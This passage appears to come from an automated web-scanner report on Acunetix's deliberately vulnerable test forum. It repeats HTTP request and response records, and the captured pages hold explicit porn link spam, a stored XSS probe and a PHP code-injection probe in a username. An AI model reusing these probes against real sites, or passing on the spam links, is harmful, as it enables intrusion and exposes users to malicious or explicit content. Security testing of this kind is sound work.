Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3437 |
| Response Body - size: 3,437 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3468 |
| Response Body - size: 3,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3357 |
| Response Body - size: 3,357 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3406 |
| Response Body - size: 3,406 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3109 |
| Response Body - size: 3,109 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3356 |
| Response Body - size: 3,356 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3309 |
| Response Body - size: 3,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries 